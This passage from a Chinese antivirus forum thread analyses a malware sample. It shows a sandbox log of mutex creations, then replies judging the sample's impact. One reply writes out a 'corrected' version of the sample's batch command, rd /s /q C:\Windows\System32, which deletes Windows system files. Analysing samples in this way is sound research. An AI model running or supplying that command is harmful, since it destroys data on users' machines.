  <activity timestamp="2015-08-23T10:15:39.907Z" id="488293" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fdc4" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.909Z" id="488294" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771907b0" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.911Z" id="488295" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771900b0" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.912Z" id="488296" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fd60" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.914Z" id="488297" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fbd4" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.917Z" id="488298" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fdf4" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.919Z" id="488299" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190f84" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.920Z" id="488300" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190f6c" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.921Z" id="488301" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77191c10" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.923Z" id="488302" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718f9dc" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.924Z" id="488303" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771b3b9b" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.926Z" id="488304" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $730312c6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.927Z" id="488305" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $73032384" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.929Z" id="488306" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76618a65" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.931Z" id="488307" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7662434b" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.933Z" id="488308" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661b17d" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.934Z" id="488309" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661db98" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.936Z" id="488310" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76619f84" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.939Z" id="488311" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661dced" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.941Z" id="488312" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661b238" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.943Z" id="488313" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7662695f" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.945Z" id="488314" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661b422" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.949Z" id="488315" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76626ade" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.950Z" id="488316" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $766182a9" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.952Z" id="488317" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $766279df" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.953Z" id="488318" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76618a29" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.955Z" id="488319" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661d22e" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.956Z" id="488320" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $766410a0" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.959Z" id="488321" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $766410dc" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.961Z" id="488322" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76635246" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.963Z" id="488323" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7663cfca" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.964Z" id="488324" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7665cb0c" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.966Z" id="488325" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7663ce54" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.968Z" id="488326" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7663f588" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.969Z" id="488327" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $766200d9" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.971Z" id="488328" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $766198fd" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.972Z" id="488329" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661ffe6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.973Z" id="488330" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661d1cf" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.975Z" id="488331" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76623961" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.976Z" id="488332" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76620e94" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.982Z" id="488333" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76625f53" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.984Z" id="488334" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7558534a" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.985Z" id="488335" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75361e06" isCreate="true" objectType="Mutex" />
  </activities>
  <children />
  </process>
  </vscope>[/mw_shl_code]
回复

举报

微光丶
 楼主| 发表于 2015-8-23 18:21:46 | 显示全部楼层
电脑发烧友 发表于 2015-8-23 18:16
跑了一下。不入沙的话,拦截了一个D盘根目录文件之后就没了。
[mw_shl_code=css,true]   
-

话说我感觉他释放出来那个批处理命令写错了   应该是rd /s /q C:\Windows\System32 若/f的话根本没用,然而这并没什么用只能删掉一部分文件- -
回复

举报

微光丶
 楼主| 发表于 2015-8-23 18:24:25 | 显示全部楼层
230f4 发表于 2015-8-23 18:16
上报

貌似没什么破坏性啊- -
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-22 01:05 , Processed in 0.152098 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表